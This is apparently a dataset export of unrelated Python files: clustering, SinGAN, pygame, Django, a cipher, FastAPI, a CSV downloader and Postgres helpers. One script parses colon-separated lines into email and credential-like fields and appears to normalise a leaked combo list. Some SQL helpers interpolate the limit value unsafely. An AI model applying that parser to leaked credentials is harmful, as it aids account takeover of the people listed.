    countries_df = make_dataframe(collect_countries())

    # Ward hierarchical clustering on the vector columns only.
    merge_history = linkage(
        countries_df.iloc[:, 1:], method="ward", metric="euclidean")

    pd.set_option("display.max_rows", 116)

    # Draw the dendrogram with country names as leaf labels.
    dendrogram(merge_history, labels=countries_df[0].values)
    plt.show()
"""
0 Afghanistan
1 Albania
2 Algeria
3 Angola
4 Armenia
5 Australia
6 Austria
7 Azerbaijan
8 Bahamas
9 Bahrain
10 Bangladesh
11 Belarus
12 Belgium
13 Belize
14 Bhutan
15 Botswana
16 Bulgaria
17 Burundi
18 Canada
19 Chile
20 China
21 Croatia
22 Cuba
23 Cyprus
24 Denmark
25 Dominica
26 Ecuador
27 Egypt
28 England
29 Eritrea
30 Estonia
31 Fiji
32 Finland
33 France
34 Gabon
35 Gambia
36 Georgia
37 Germany
38 Ghana
39 Greece
40 Greenland
41 Guinea
42 Guyana
43 Honduras
44 Hungary
45 Indonesia
46 Iran
47 Iraq
48 Ireland
49 Italy
50 Jamaica
51 Japan
52 Jordan
53 Kazakhstan
54 Kenya
55 Kyrgyzstan
56 Laos
57 Latvia
58 Lebanon
59 Liberia
60 Libya
61 Liechtenstein
62 Lithuania
63 Macedonia
64 Madagascar
65 Malawi
66 Mali
67 Malta
68 Mauritania
69 Moldova
70 Montenegro
71 Morocco
72 Mozambique
73 Namibia
74 Nepal
75 Nicaragua
76 Niger
77 Nigeria
78 Norway
79 Oman
80 Pakistan
81 Peru
82 Philippines
83 Poland
84 Portugal
85 Qatar
86 Romania
87 Russia
88 Rwanda
89 Samoa
90 Senegal
91 Serbia
92 Slovakia
93 Slovenia
94 Somalia
95 Spain
96 Sudan
97 Suriname
98 Sweden
99 Switzerland
100 Syria
101 Taiwan
102 Tajikistan
103 Thailand
104 Tunisia
105 Turkey
106 Turkmenistan
107 Tuvalu
108 Uganda
109 Ukraine
110 Uruguay
111 Uzbekistan
112 Venezuela
113 Vietnam
114 Zambia
115 Zimbabwe
""" |
998,189 | e0998c54df03880afb47af50013bf18be820cece | """Inject a given image into the SinGAN. This can be used for Super-Resolution, Paint-to-Image, Harmonization and Editiing."""
import torch
from src.singan import SinGAN
import argparse
from datetime import datetime
from skimage import io
import numpy as np
from src.image import load_img
from skimage.color import lab2rgb
# Command-line arguments.
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default='cuda', help='cuda or cpu')
parser.add_argument('--path', type=str, default='./assets/clip_art.png', help='path to clip art image')
parser.add_argument('--save_path', type=str, default='./train', help='path to save images')
parser.add_argument('--scale', type=int, default=2, help='injection_scale scale, from 0 to N')
# Get arguments
args = parser.parse_args()
# Init variables
device = torch.device('cuda:0') if args.device=='cuda' else torch.device('cpu')
path = args.path
injection_scale = args.scale
# Load the clip-art image to inject (src.image.load_img).
clip_art = load_img(path, device)
# Create SinGAN model.
# NOTE(review): the positional hyper-parameters (0.1, 0.1, 10, 1, 1, 1, None)
# are undocumented here -- see src.singan.SinGAN for their meaning.
singan = SinGAN(device, 0.1, 0.1, 10, 1, 1, 1, None)
# Load trained model (look at standard path)
singan.load()
# Warn (but continue) if the scale pyramid is not fully trained.
if not singan.trained_scale == singan.N:
    print('SinGAN is not completely trained! You can use train.py --load to train it completely.')
    input('Press enter to continue')
# Inject the clip art at the chosen pyramid scale.
img = singan.paint_to_img(clip_art, injection_scale=injection_scale)
# Save images use as name the current date
now = datetime.now()
date = now.strftime('%Y_%m_%d-%H_%M_%S')
# Output path: <save_path>/clipart_<timestamp>.png
PATH = args.save_path + '/clipart_' + date + f'.png'
# CHW tensor -> HWC numpy array on the CPU.
img = img[0].cpu().detach().permute(1, 2, 0)
img = img.numpy()
# Undo the model's normalization back to CIELAB ranges: channel 0 (L) maps
# [-1,1] -> [0,100]; channels 1-2 (a/b) are rescaled by 127.5 then shifted.
# NOTE(review): assumes the network emits LAB channels in roughly [-1,1] --
# confirm against the forward normalization in src.image.load_img.
img[:,:,0] += 1
img[:,:,0] *= 50
img[:,:,1:] *= 127.5
img[:,:,1:] -= 0.5
img = (lab2rgb(img)*255).astype(np.uint8)
io.imsave(PATH, img) |
998,190 | a654dd5d13eaeeb2b96edce9c1c896f240b599af | import pygame as pyg
from fileslibparcial.libreria import *
if __name__ == "__main__":
    # NOTE(review): ANCHO/ALTO, MOSTAZA and the helpers (changeCentroPlano,
    # transformToCarte, getR, polarToCart, drawplano, getplanopos,
    # getPointSquare, putandmove) come from the star import of
    # fileslibparcial.libreria -- verify their contracts there.
    pyg.init()
    pantalla = pyg.display.set_mode([ANCHO,ALTO])
    changeCentroPlano(200, 300)
    # Square centred on the plane origin.
    cuadrado = [[100,100], [-100,100], [-100,-100], [100, -100]]
    # Separator line (plane coords converted to screen coords once, up front).
    linea = [[210, 110], [210, -110]]
    linea = transformToCarte(linea)
    # Polar values for the rotating point.
    r = getR(cuadrado[0][0], 45)
    angulo = 0
    puntosq = polarToCart(r, angulo)
    # Accumulated points of the scrolling graph.
    gfpoints = []
    reloj = pyg.time.Clock()
    fin = False
    while(not fin):
        for event in pyg.event.get():
            if event.type == pyg.QUIT:
                fin = True
        # Logic: clear the frame.
        pantalla.fill([0,0,0])
        # Fixed objects (plane, square, separator line).
        drawplano(pantalla)
        pyg.draw.polygon(pantalla, [0,250,0], transformToCarte(cuadrado), 1)
        pyg.draw.line(pantalla, MOSTAZA, linea[0], linea[1])
        # Circle animation (disabled).
        #pyg.draw.circle(pantalla, [250,0,0], getplanopos(puntosq[0], puntosq[1]), 1)
        # Rotating-line endpoints (pfinal is only used by the disabled draw below).
        pinicial = getplanopos(0, 0)
        pfinal = getplanopos(puntosq[0], puntosq[1])
        #pyg.draw.line(pantalla, ROSA, pinicial, pfinal)
        # Clamp the rotating line to the square's boundary.
        puntosquare = getPointSquare(100, 100, puntosq[0], puntosq[1], angulo)
        psf = getplanopos(puntosquare[0], puntosquare[1])
        pyg.draw.line(pantalla, MOSTAZA, pinicial, psf)
        # Scroll the traced y-values along the graph area.
        putandmove(pantalla, gfpoints, psf[1], [linea[0][0], 300])
        # Reset the angle after a full revolution.
        if(angulo == 360):
            angulo = 0
        else:
            # Advance one degree per frame.
            angulo += 1
        puntosq = polarToCart(r, angulo)
        pyg.display.flip()
        reloj.tick(60)
    print("Fin del programa")
|
998,191 | c421c7a1c8a5d97eca8ca38bf04c44fb0c24eba7 | #!/usr/bin/env python
# encoding: utf-8
'''
@author: kdb
@file: urls.py
@time: 2018/7/15 0015 下午 8:47
'''
from django.conf.urls import url
from users.views import register,UserUpdateView
app_name = 'users'
urlpatterns = [
url(r'^register/',register,name='register'),
url(r'^user_update/(?P<pk>\d+)/$',UserUpdateView.as_view(),name='user_update'),
] |
998,192 | d34e04e749d535bee499c446419819858a05cb55 | from string import ascii_lowercase, ascii_uppercase
LENGTH = len(ascii_lowercase)
def rotate(text, rot):
    """
    Implementation of the rotational cipher, also sometimes called the Caesar cipher.

    :param text: Text to encode
    :param rot: How many places to rotate. 13 means rotate by 13 places.
    :return: Encoded text
    """
    # Encode character by character; non-letters pass through unchanged.
    return ''.join(convert(symbol, rot) for symbol in text)
def convert(char, rot):
    """Rotate a single character by `rot` places within its own case,
    returning non-alphabetic characters unchanged."""
    for alphabet in (ascii_lowercase, ascii_uppercase):
        pos = alphabet.find(char)
        if pos != -1:
            return alphabet[(pos + rot) % len(alphabet)]
    return char
|
998,193 | b4aa9f367639087855e9ad64585720487ca83d63 | import re
from threading import Thread
from os.path import getsize
from time import sleep
tfname = './x2.txt'
sfname = './x2_completed.txt'
sfname2 = './x2_error.txt'
re_control_char = re.compile('[\x00-\x09|\x0b-\x0c|\x0e-\x1f]')
re_email = re.compile(r'\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*')
completed = False
def status_monitor(target, save_files):
    """Report progress once per second until the module-level `completed`
    flag is set: prints combined size of `save_files` versus `target` in MB."""
    total_label = '%.2fMB' % (getsize(target)/1024/1024)
    while not completed:
        written = sum(getsize(fname) for fname in save_files)
        print('%.2f/%s' % (written/1024/1024, total_label))
        sleep(1)
# Stream the input dump line by line, normalise each record, and route it to
# the "completed" or "error" output file. All files use GB18030 with
# undecodable bytes ignored.
with open(tfname, encoding="GB18030", errors ='ignore') as f, open(sfname, 'w', encoding="GB18030", errors ='ignore') as sf, open(sfname2, 'w', encoding="GB18030", errors ='ignore') as sferror:
    # Background progress reporter; runs until `completed` is set below.
    Thread(target=status_monitor, args=(tfname, (sfname, sfname2))).start()
    for line in f:
        # Strip surrounding whitespace, then remove embedded control chars.
        line = re_control_char.sub('', line.strip())
        data = line.split(':')
        email = ''
        for i in range(len(data)):
            # strip('@') rejects fields that are nothing but '@' signs.
            if '@' in data[i].strip('@'):
                email = data.pop(i)
                # Reorder to [first field, email, second field after the pop].
                # NOTE(review): when the email was the FIRST field, data[0]
                # here is the original second field -- confirm the intended
                # column order for that case.
                data = [data[0], email, data[1]]
                break
        # Keep records that have an email, at least one other non-empty
        # field, and a third field of 4+ chars; everything else goes to the
        # error file.
        if email and not ((data[0]=='' and data[1]=='') or (len(data[2]) < 4)):
            sf.write('~||`'.join(data) + '\n')
            continue
        sferror.write(line + '\n')
completed = True |
998,194 | 8636d9ebd02335f9d333663d8a6c564d4f156afe |
import pandas as pd
import joblib
from fastapi import FastAPI
app = FastAPI()
# define a root `/` endpoint
@app.get("/")
def index():
    """Health-check root endpoint; returns a static OK payload."""
    return {"ok": True}
# Implement a /predict endpoint
@app.get("/predict/")
def create(acousticness,
           danceability,
           duration_ms,
           energy,
           explicit,
           id,
           instrumentalness,
           key,
           liveness,
           loudness,
           mode,
           name,
           release_date,
           speechiness,
           tempo,
           valence,
           artist):
    """Predict a track's popularity from its audio features.

    Parameters arrive as query-string values and are cast to the numeric
    types the pipeline expects (id/name/release_date/artist stay strings).
    Returns the artist, track name, and predicted popularity.
    """
    # Build a single-row frame; each value is wrapped in a list to form one sample.
    X = pd.DataFrame(dict(
        acousticness = [float(acousticness)],
        danceability = [float(danceability)],
        duration_ms = [int(duration_ms)],
        energy = [float(energy)],
        explicit = [int(explicit)],
        id = [id],
        instrumentalness = [float(instrumentalness)],
        key = [int(key)],
        liveness = [float(liveness)],
        loudness = [float(loudness)],
        mode = [int(mode)],
        name = [name],
        release_date = [release_date],
        speechiness = [float(speechiness)],
        tempo = [float(tempo)],
        valence = [float(valence)],
        artist = [artist]))
    # NOTE(review): the model is reloaded from disk on every request --
    # consider loading it once at module import if latency matters.
    pipeline = joblib.load('model.joblib')
    results = pipeline.predict(X)
    pred = float(results[0])
    return dict(artist=artist,
                name=name,
                popularity=pred)
|
998,195 | b76282137c0f2e95c99ab2fabe491e72db487024 | import pprint
from django.conf import settings
from django.core.management.base import BaseCommand
import requests
class Command(BaseCommand):
    """Management command: fetch one flyer item and pretty-print its JSON."""

    def handle(self, *args, **options):
        # Hard-coded item to inspect; the endpoint template comes from settings.
        item_id = 171266044
        endpoint = settings.FLYER['item_url'].format(item_id)
        payload = requests.get(endpoint).json()
        pprint.pprint(payload)
|
998,196 | c54a19bc49f9996e6bf9d26b495f877b213b27d4 | import requests
import os, csv, time
# Download the ROC-year 103-108 student-statistics CSVs from the Ministry of
# Education and re-save columns 1-4 of each file locally.
url = 'http://stats.moe.gov.tw/files/detail/{0}/{0}_student.csv'
for year in range(103, 109):
    csvdata = requests.get(url.format(year)).text
    rows = csvdata.split('\n')
    data = list()
    columns = rows[0].split(',')
    for row in rows[1:]:
        try:
            # Keep fields 1-4, stripping the surrounding double quotes.
            fields = row.split(',')
            item = [fields[f_index].replace('"', '') for f_index in range(1, 5)]
            data.append(item)
        # BUG FIX: was a bare `except:` that swallowed every error (including
        # KeyboardInterrupt and genuine bugs); only short rows such as the
        # trailing blank line are expected, so catch just IndexError.
        except IndexError:
            pass
    filename = os.path.basename(url.format(year))
    print(filename, "is writing...")
    with open(filename, "w", encoding='utf-8', newline="") as fp:
        writer = csv.writer(fp)
        writer.writerow(columns[1:5])
        writer.writerows(data)
    time.sleep(3)  # be polite to the server between downloads
print("done")
998,197 | 64fbeff8cce0f3b890e14ef82cae3fcc715676c3 | # coding: utf-8
import psycopg2
DBNAME = "kumo"
DEFAULT_LIMIT = 100
def is_station_id(station_id):
    """Return True if `station_id` is no greater than the last assigned id.

    Compares against the `stations_id_seq` sequence's last value.
    """
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    try:
        with cnx.cursor() as cur:
            cur.execute("SELECT last_value FROM stations_id_seq;")
            last_value = cur.fetchone()[0]
        return station_id <= last_value
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def is_country(country):
    """Return True when `country` appears in the known-countries list."""
    known = countries()
    return country in known
def station(by_id):
    """Return the station row(s) whose id equals `by_id` (as a list of tuples)."""
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    try:
        with cnx.cursor() as cur:
            cur.execute("SELECT * FROM stations WHERE id = %(station_id)s;",
                        {'station_id': by_id})
            return cur.fetchall()
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def stations(limit=DEFAULT_LIMIT, country=None, station_type=None):
    """Return up to `limit` station rows, optionally filtered by country
    and/or station type.

    `country` and `station_type` are passed as bound query parameters;
    `limit` is interpolated directly and must be a trusted integer.
    """
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    query = ["SELECT * FROM stations"]
    params = {}
    if country is not None:
        params['country'] = country
        query.append(" country = %(country)s")
    if station_type is not None:
        params['type'] = station_type
        query.append(" type = %(type)s")
    query_limit = " LIMIT %s" % limit
    if len(query) > 1:
        # BUG FIX: was 'AND'.join(...), which glued the conditions together
        # without spaces ("... %(country)sAND type = ...") and produced
        # invalid SQL whenever both filters were supplied.
        query = query[0] + ' WHERE ' + ' AND '.join(query[1:])
    else:
        query = query[0]
    query += query_limit
    try:
        with cnx.cursor() as cur:
            cur.execute(query, params)
            return cur.fetchall()
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def countries(limit=DEFAULT_LIMIT):
    """Return the sorted list of distinct station countries (up to `limit`).

    `limit` is interpolated directly into the SQL and must be a trusted int.
    """
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    try:
        with cnx.cursor() as cur:
            cur.execute("SELECT DISTINCT country FROM stations ORDER BY country LIMIT %s;" % limit)
            return [x[0] for x in cur.fetchall()]
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def by_country(name, limit=DEFAULT_LIMIT, station_type=None):
    """Return up to `limit` station rows for country `name` (capitalized),
    optionally filtered by station type.

    `name` and `station_type` are bound parameters; `limit` is interpolated
    directly and must be a trusted integer.
    """
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    params = {'name': name.capitalize()}
    query = "SELECT * FROM stations WHERE country = %(name)s"
    if station_type is not None:
        params['type'] = station_type
        query += " AND type = %(type)s"
    query += " LIMIT %s" % limit
    try:
        with cnx.cursor() as cur:
            cur.execute(query, params)
            return cur.fetchall()
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def species(limit=DEFAULT_LIMIT):
    """Return up to `limit` distinct species values in ascending order.

    `limit` is interpolated directly into the SQL and must be a trusted int.
    """
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    try:
        with cnx.cursor() as cur:
            cur.execute("SELECT DISTINCT species FROM stations ORDER BY species ASC LIMIT %s ;" % limit)
            return [x[0] for x in cur.fetchall()]
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
def by_species(name):
    """Return every station row whose species equals `name`."""
    cnx = psycopg2.connect("dbname={}".format(DBNAME))
    try:
        with cnx.cursor() as cur:
            cur.execute("SELECT * FROM stations WHERE species = %(name)s",
                        {'name': name})
            return cur.fetchall()
    finally:
        # BUG FIX: the connection used to be left open (leaked) on every call.
        cnx.close()
|
998,198 | 8e708c2da757183ff4be0866e09a73cad85b3cad | from tensorflow.keras.models import load_model
if __name__ == '__main__':
    # NOTE(review): skeleton/template code -- x_test and y_test are never
    # defined in this file and `acc = ...` is a literal Ellipsis placeholder,
    # so this script cannot run as-is.
    # Load the data
    # ...
    # Preprocessing
    # ...
    # Load the trained models
    #for example
    model_task1 = load_model('./nn_task1.h5')
    # Predict on the given samples
    #for example
    y_pred_task1 = model_task1.predict(x_test)
    # Evaluate the missclassification error on the test set
    # for example
    # Sanity check: predictions must align with the labels, shape-wise.
    assert y_test.shape == y_pred_task1.shape
    acc = ... # placeholder: compute accuracy with a proper metric function here
    print("Accuracy model task 1:", acc)
|
998,199 | 120804177bd3e537a5a8ed11c9eb9ded8d07731d | class first():
def method(self):
print('method of first class')
class second():
    """Demo class defining `method` with the same name as class `first`."""
    def method(self):
        # Identifies which class handled the call.
        print('method of second class')
# Demo: the same variable is rebound to an instance of each class; each call
# dispatches to the method of whichever class the current object belongs to.
obj=first()
obj.method()
obj=second()
obj.method()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.